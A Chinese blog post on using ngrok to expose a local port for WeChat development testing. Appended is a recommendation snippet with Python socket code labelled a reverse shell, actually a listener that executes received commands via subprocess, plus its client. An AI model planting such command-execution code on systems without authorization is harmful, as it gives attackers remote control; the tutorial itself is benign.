内网穿刺:利用ngrok实现内网穿刺

1.工具地址:ngrok地址

    作用介绍:ngrok可以将自己本地端口发布到公网上访问,此为免费版所以域名时随机分配,如需使用固定域名即自行去官网,此工具一般是用来测试项目需要在外网环境的,我是用于微信开发的测试。

2.操作步骤

  1. 下载完之后,运行ngrok.exe文件,效果如下。
  2. 然后输入ngrok http xxxx(你需要穿透的本地端口号)
  3.  输入完之后的页面效果:
    这样就发布成功了,这个上面有一个本地的4040的端口地址可以查看到分配给你的公网域名,通过此域名可以访问到你所穿透的端口号

    通过访问分配的域名可以直接访问你穿透的端口号

    这里我就直接拿tomcat演示一下。到这里就结束了!
  4. 要注意的地方:
    -此工具因为为免费版所以只能穿透8个小时
    -然后每一次重新穿透都会重新分配域名
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python 内网穿刺(Python reverse shell)是一种技术,用于在一个局域网中的计算机上远程执行命令。它通常用于网络安全测试和渗透测试中,以验证系统的安全性。 在 Python 中,可以使用 `socket` 模块来实现一个简单的内网穿刺工具。下面是一个简单的例子: ```python import socket import subprocess # 设置监听的本地 IP 和端口号 host = '192.168.1.100' port = 1234 # 创建 socket 对象 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 绑定 IP 和端口号 s.bind((host, port)) # 监听连接 s.listen(1) print(f"Listening on {host}:{port}...") # 接受连接 conn, addr = s.accept() print(f"Connected by {addr[0]}:{addr[1]}") # 循环接收和执行命令 while True: cmd = conn.recv(1024).decode() if cmd.lower() == 'exit': break output = subprocess.getoutput(cmd) conn.send(output.encode()) # 关闭连接 conn.close() ``` 以上代码是一个简单的服务器端程序,它会监听指定的 IP 和端口,接受客户端的连接,并将客户端发送的命令执行后返回结果。你可以将该代码保存为 `server.py` 并在服务器上运行。 客户端代码如下: ```python import socket # 设置服务器的 IP 和端口号 host = '192.168.1.100' port = 1234 # 创建 socket 对象 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 连接服务器 s.connect((host, port)) # 循环发送命令并接收结果 while True: cmd = input("Enter command (or 'exit' to quit): ") s.send(cmd.encode()) if cmd.lower() == 'exit': break output = s.recv(1024).decode() print(output) # 关闭连接 s.close() ``` 以上代码是一个简单的客户端程序,它会连接到指定的服务器 IP 和端口,并发送用户输入的命令,并打印服务器返回的结果。你可以将该代码保存为 `client.py` 并在客户端上运行。 需要注意的是,内网穿刺是一种潜在的安全风险,使用时需要谨慎,并确保在合法授权的范围内进行使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值